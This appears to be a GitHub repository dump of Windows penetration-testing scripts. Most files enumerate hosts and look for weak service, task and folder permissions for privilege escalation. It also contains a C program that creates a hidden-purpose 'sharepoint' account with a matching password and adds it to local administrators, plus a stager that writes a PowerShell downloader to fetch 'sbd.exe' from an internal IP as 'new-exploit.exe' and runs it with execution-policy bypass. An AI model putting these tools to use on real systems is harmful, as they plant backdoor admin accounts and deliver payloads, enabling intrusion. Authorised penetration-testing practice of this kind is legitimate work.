Repository: ankh2054/windows-pentest Branch: master Commit: abc51e0b58de Files: 7 Total size: 7.7 KB Directory structure: gitextract__chh5jcc/ ├── Powershell/ │ ├── folderperms.ps1 │ └── powershell_download_file.txt ├── README.md ├── adducer.c ├── icacls.bat ├── schcheck.bat └── wmic-info ================================================ FILE CONTENTS ================================================ ================================================ FILE: Powershell/folderperms.ps1 ================================================ # Author : Parvez Anwar (@parvezghh) # Date : 17/11/13 # # powershell.exe -executionpolicy bypass -file folderperm.ps1 $numofpaths = 0 $countcopies = 0 $filetocopy = "testfile.txt" $myarray = (gi env:path).value.split(';') Write-Host "" Write-Host "[i] Number of folder paths :" $myarray.count # If the last path entry ends in semi-colon if ($myarray[$myarray.count-1] -eq "") { $numofpaths = $myarray.count - 2 } else { $numofpaths = $myarray.count - 1 } New-Item $filetocopy -type file | Out-Null $FileExists = (Test-Path $filetocopy) if (!($FileExists)) { Write-Host "[i] Dummy test file used to test access was not outputted:" $filetocopy exit } Write-Host "[i] Copying and removing test file to path folders where access is granted" for($i=0; $i -le $numofpaths; $i++) { if (Test-Path -Path $myarray[$i]) { Copy-Item $filetocopy $myarray[$i] -errorAction SilentlyContinue -errorVariable errors if ($errors.count -le 0) { Write-Host -foregroundColor Green " Access granted:" $myarray[$i] $countcopies = $countcopies + 1 $filetoremove = $myarray[$i] + "\" + $filetocopy Remove-Item $filetoremove } else { Write-Host -foregroundColor Red " Access denied :" $myarray[$i] } } else { Write-Host -foregroundColor Blue " Folder missing:" $myarray[$i] } } Remove-Item $filetocopy ================================================ FILE: Powershell/powershell_download_file.txt ================================================ echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://10.11.0.36/sbd.exe" >>wget.ps1 echo $file = "new-exploit.exe" >>wget.ps1 echo $webclient.DownloadFile($url,$file) >>wget.ps1 ================================================ FILE: README.md ================================================ # windows-pentest Windows Pentest Scripts and Tools. #### wmic-info - Retrieve system info. Uses WMIC to gather various important informatoon about a windows host and dump it to HTML. #### icacls.bat - Weak permissions on Services. * Script that queries all services. * Removes default tasks and any Microsot related. * Then checks the BINARY_PATHS for any exeuctables that have the Everyone or Usergroup set with RW access. #### schcheck.bat - Weak permissions on scheduled task executables. * Lists all schededuled tasks. * Runs list of executables against icacls and checks if any allow Everyone RW permissions. #### adduser.c - Creates user and adds to administrator group. * Creates a user called sharepoint with password sharepoint. Add's user to local administrators group. * To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c #### Powershell/powershell_download_file.txt - Create wget powershell script to download external files. * Copy file contents to clipboard using > `cat powershell_download_file.txt | xclip -selection clipboard` * Paste into Windows command prompt which will create a **wget.ps1** * `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1` #### Privelege/Accesschk-2003-xp.exe & accesschk-2008-vista.exe ##### Identify the level of access a particular user or groups have to files, directories, Registry keys. When executing any of the sysinternals tools for the first time the user will be presented with a GUI pop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flag to automatically accept the EULA. accesschk.exe /accepteula The following command reports the accesses that the Power Users account has to files and directories in \Windows\System32: accesschk "power users" c:\windows\system32 This command shows which Windows services members of the Users group have write access to: accesschk users -cw * Check what access authenticated users have to services. accesschk.exe -uwcqv "Authenticated Users" * Check which Windows services a user called adam.dale has write access to: accesschk.exe -uwcqv adam.dale * Check to see what access permissions are set on the serice called NetLogon accesschk.exe -ucqv NetLogon Find all weak folder permissions per drive. accesschk.exe -uwdqs Users c:\ accesschk.exe -uwdqs "Authenticated Users" c:\ Find all weak file permissions per drive. accesschk.exe -uwqs Users c:\*.* accesschk.exe -uwqs "Authenticated Users" c:\*.* To see what Registry keys under HKLM\CurrentUser a specific account has no access to: accesschk -kns austin\mruss hklm\software To see the security on the HKLM\Software key: accesschk -k hklm\software To see all files under \Users\Mark on Vista that have an explicit integrity level: accesschk -e -s c:\users\mark To see all global objects that Everyone can modify: accesschk -wuo everyone \basednamedobjects #### Powershell/folderperms.ps1 ##### Checks for folders in the current PATH variable that are writeable for all authenticated users. When new folders are created in the root it is writeable for all authenticated users by default. The “NT AUTHORITY\Authenticated Users:(I)(M)” gets added to the folder where M stands for modify access. So any application that gets installed on the root can be tampered with by a non-admin user. The script checks for any of those folders that are writeable by authenticated users. ================================================ FILE: adducer.c ================================================ #include /* system, NULL, EXIT_FAILURE */ /* Creates a user called sharepoint with password sharepoint. Add's user to local administrators group. */ /* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c */ int main () { int i; i=system ("net user sharepoint sharepoint /add & net localgroup administrators sharepoint /add"); return 0; } ================================================ FILE: icacls.bat ================================================ @echo off REM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access. REM Type: Incorrect file permissions REM Note: The ^ characters escapes certain characters that brerak the FOR loop. REM Note: tokens=1* - The value at the first delimeter and everything after. for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do ( for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do ( for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do ( icacls "%%~x" ) ) ) ================================================ FILE: schcheck.bat ================================================ @echo off REM - Lists all schededuled tasks. Runs list of executables against icacls and checks if any allow Everyone RW permissions. REM - Note: At present the script only ECHO's tasks. for /f "tokens=3* delims=: " %%m in ('schtasks /query /v /fo LIST ^| find "Task To Run:"') do ( for /f "tokens=1* delims=?" %%x in ('echo(%%~n^| findstr /L /V /I /C:"COM handler" /C:"multiple" /C:"%SystemRoot%" /C:"shutdown"') do ( ECHO %%~x REM > results.txt ) ) ================================================ FILE: wmic-info ================================================ for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A" wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html wmic USERACCOUNT list full /format:"%var%" >> out.html wmic group list full /format:"%var%" >> out.html wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html wmic netuse list full /format:"%var%" >> out.html wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html